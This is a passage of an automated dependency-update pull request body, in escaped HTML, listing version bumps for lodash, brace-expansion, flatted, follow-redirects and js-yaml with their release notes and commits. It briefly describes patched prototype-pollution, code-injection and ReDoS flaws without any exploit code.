href=\"https://www.npmjs.com/package/lodash.sortedindexby\"\u003elodash.sortedindexby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.zipobjectdeep\"\u003elodash.zipobjectdeep\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.unset\"\u003elodash.unset\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.omit\"\u003elodash.omit\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.template\"\u003elodash.template\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/cb0b9b9212521c08e3eafe7c8cb0af1b42b6649e\"\u003e\u003ccode\u003ecb0b9b9\u003c/code\u003e\u003c/a\u003e release(patch): bump main to 4.18.1 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6177\"\u003e#6177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/75535f57883b7225adb96de1cfc1cd4169cfcb51\"\u003e\u003ccode\u003e75535f5\u003c/code\u003e\u003c/a\u003e chore: prune stale advisory refs (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6170\"\u003e#6170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/62e91bc6a39c98d85b9ada8c44d40593deaf82a4\"\u003e\u003ccode\u003e62e91bc\u003c/code\u003e\u003c/a\u003e docs: remove n_ Node.js \u0026lt; 6 REPL note from README (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6165\"\u003e#6165\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/59be2de61f8aa9461c7856533b51d31b7d8babc4\"\u003e\u003ccode\u003e59be2de\u003c/code\u003e\u003c/a\u003e release(minor): bump to 4.18.0 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6161\"\u003e#6161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/af634573030f979194871da7c68f79420992f53d\"\u003e\u003ccode\u003eaf63457\u003c/code\u003e\u003c/a\u003e fix: broken tests for _.template 879aaa9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/1073a7693e1727e0cf3641e5f71f75ddcf8de7c0\"\u003e\u003ccode\u003e1073a76\u003c/code\u003e\u003c/a\u003e fix: linting issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e\u003ccode\u003e879aaa9\u003c/code\u003e\u003c/a\u003e fix: validate imports keys in _.template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003e\u003ccode\u003efe8d32e\u003c/code\u003e\u003c/a\u003e fix: block prototype pollution in baseUnset via constructor/prototype traversal\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/18ba0a32f42fd02117f096b032f89c984173462d\"\u003e\u003ccode\u003e18ba0a3\u003c/code\u003e\u003c/a\u003e refactor(fromPairs): use baseAssignValue for consistent assignment (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6153\"\u003e#6153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b8190803d48d60b8c80ad45d39125f32fa618cb2\"\u003e\u003ccode\u003eb819080\u003c/code\u003e\u003c/a\u003e ci: add dist sync validation workflow (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6137\"\u003e#6137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.14\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/10c05fcf3699b1a29ef5e611c011af3d3c97e6e3\"\u003e\u003ccode\u003e10c05fc\u003c/code\u003e\u003c/a\u003e 1.1.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/1afa1b22ead12f6a7a02f25bf0f7d64c2439b007\"\u003e\u003ccode\u003e1afa1b2\u003c/code\u003e\u003c/a\u003e Add opt-in { max } mitigation to v1 legacy line (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/2fbb6a2aa0f984bb2fb5f60252ca6cba3e1368ec\"\u003e\u003ccode\u003e2fbb6a2\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u0026quot; (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/0d7652e3093d3273151729812f9b0b79a17ecba6\"\u003e\u003ccode\u003e0d7652e\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-7h2j-956f-4vf2 to v1 (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/101\"\u003e#101\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/44f33b47c5c6a965d507421af43e86cf5971d711\"\u003e\u003ccode\u003e44f33b4\u003c/code\u003e\u003c/a\u003e 1.1.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c460dbd68e428d147b2080622d8ce126c7a08570\"\u003e\u003ccode\u003ec460dbd\u003c/code\u003e\u003c/a\u003e pkg: publish on tag 1.x\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/ccb8ac6d4292b7661b677fe048ba6690c877f51f\"\u003e\u003ccode\u003eccb8ac6\u003c/code\u003e\u003c/a\u003e fmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/c3c73c8b088defc70851843be88ccc3af08e7217\"\u003e\u003ccode\u003ec3c73c8\u003c/code\u003e\u003c/a\u003e Fix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/1.1.11...v1.1.14\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flatted` from 3.3.3 to 3.4.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/3bf09091c3562e17a0647bc06710dd6097079cf7\"\u003e\u003ccode\u003e3bf0909\u003c/code\u003e\u003c/a\u003e 3.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/885ddcc33cf9657caf38c57c7be45ae1c5272802\"\u003e\u003ccode\u003e885ddcc\u003c/code\u003e\u003c/a\u003e fix CWE-1321\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/0bdba705d130f00892b1b8fcc80cf4cdea0631e3\"\u003e\u003ccode\u003e0bdba70\u003c/code\u003e\u003c/a\u003e added flatted-view to the benchmark\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/2a02dce7c641dec31194c67663f9b0b12e62da20\"\u003e\u003ccode\u003e2a02dce\u003c/code\u003e\u003c/a\u003e 3.4.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/fba4e8f2e113665da275b19cd0f695f3d98e9416\"\u003e\u003ccode\u003efba4e8f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/WebReflection/flatted/issues/89\"\u003e#89\u003c/a\u003e from WebReflection/python-fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/5fe86485e6df7f7f34a07a2a85498bd3e17384e7\"\u003e\u003ccode\u003e5fe8648\u003c/code\u003e\u003c/a\u003e added \u0026quot;when in Rome\u0026quot; also a test for PHP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/53517adbefe724fe472b2f9ebcdb01910d0ae3f0\"\u003e\u003ccode\u003e53517ad\u003c/code\u003e\u003c/a\u003e some minor improvement\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/b3e2a0c387bf446435fec45ad7f05299f012346f\"\u003e\u003ccode\u003eb3e2a0c\u003c/code\u003e\u003c/a\u003e Fixing recursion issue in Python too\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/c4b46dbcbf782326e54ea1b65d3ebb1dc7a23fad\"\u003e\u003ccode\u003ec4b46db\u003c/code\u003e\u003c/a\u003e Add SECURITY.md for security policy and reporting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/WebReflection/flatted/commit/f86d071e0f70de5a7d8200198824a3f07fc9c988\"\u003e\u003ccode\u003ef86d071\u003c/code\u003e\u003c/a\u003e Create dependabot.yml for version updates\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/WebReflection/flatted/compare/v3.3.3...v3.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.11 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.11...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.23 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via \u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching \u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-r5fr-rjxr-66jc\u003c/a\u003e, CVE-2026-4800, \u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e879aaa9\u003c/a\u003e). Fixes an incomplete patch for CVE-2021-23337. The \u003ccode\u003evariable\u003c/code\u003e option was validated against \u003ccode\u003ereForbiddenIdentifierChars\u003c/code\u003e but \u003ccode\u003eimportsKeys\u003c/code\u003e was left unguarded, allowing code injection via the same \u003ccode\u003eFunction()\u003c/code\u003e constructor sink. \u003ccode\u003eimports\u003c/code\u003e keys containing forbidden identifier characters now throw \u003ccode\u003e\u0026quot;Invalid imports option passed into _.template\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security notice for \u003ccode\u003e_.template\u003c/code\u003e in threat model and API docs (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6099\"\u003e#6099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDocument \u003ccode\u003elower \u0026gt; upper\u003c/code\u003e behavior in \u003ccode\u003e_.random\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6115\"\u003e#6115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix quotes in \u003ccode\u003e_.compact\u003c/code\u003e jsdoc (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6090\"\u003e#6090\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003elodash.*\u003c/code\u003e modular packages\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6157\"\u003eDiff\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe have also regenerated and published a select number of the \u003ccode\u003elodash.*\u003c/code\u003e modular packages.\u003c/p\u003e\n\u003cp\u003eThese modular packages had fallen out of sync significantly from the minor/patch updates to lodash. Specifically, we have brought the following packages up to parity w/ the latest lodash release because they have had CVEs on them in the past:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.orderby\"\u003elodash.orderby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.tonumber\"\u003elodash.tonumber\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trim\"\u003elodash.trim\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trimend\"\u003elodash.trimend\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.sortedindexby\"\u003elodash.sortedindexby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.zipobjectdeep\"\u003elodash.zipobjectdeep\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.unset\"\u003elodash.unset\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.omit\"\u003elodash.omit\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.template\"\u003elodash.template\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/cb0b9b9212521c08e3eafe7c8cb0af1b42b6649e\"\u003e\u003ccode\u003ecb0b9b9\u003c/code\u003e\u003c/a\u003e release(patch): bump main to 4.18.1 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6177\"\u003e#6177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/75535f57883b7225adb96de1cfc1cd4169cfcb51\"\u003e\u003ccode\u003e75535f5\u003c/code\u003e\u003c/a\u003e chore: prune stale advisory refs (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6170\"\u003e#6170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/62e91bc6a39c98d85b9ada8c44d40593deaf82a4\"\u003e\u003ccode\u003e62e91bc\u003c/code\u003e\u003c/a\u003e docs: remove n_ Node.js \u0026lt; 6 REPL note from README (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6165\"\u003e#6165\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/59be2de61f8aa9461c7856533b51d31b7d8babc4\"\u003e\u003ccode\u003e59be2de\u003c/code\u003e\u003c/a\u003e release(minor): bump to 4.18.0 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6161\"\u003e#6161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/af634573030f979194871da7c68f79420992f53d\"\u003e\u003ccode\u003eaf63457\u003c/code\u003e\u003c/a\u003e fix: broken tests for _.template 879aaa9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/1073a7693e1727e0cf3641e5f71f75ddcf8de7c0\"\u003e\u003ccode\u003e1073a76\u003c/code\u003e\u003c/a\u003e fix: linting issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e\u003ccode\u003e879aaa9\u003c/code\u003e\u003c/a\u003e fix: validate imports keys in _.template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003e\u003ccode\u003efe8d32e\u003c/code\u003e\u003c/a\u003e fix: block prototype pollution in baseUnset via constructor/prototype traversal\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/18ba0a32f42fd02117f096b032f89c984173462d\"\u003e\u003ccode\u003e18ba0a3\u003c/code\u003e\u003c/a\u003e refactor(fromPairs): use baseAssignValue for consistent assignment (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6153\"\u003e#6153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b8190803d48d60b8c80ad45d39125f32fa618cb2\"\u003e\u003ccode\u003eb819080\u003c/code\u003e\u003c/a\u003e ci: add dist sync validation workflow (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6137\"\u003e#6137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 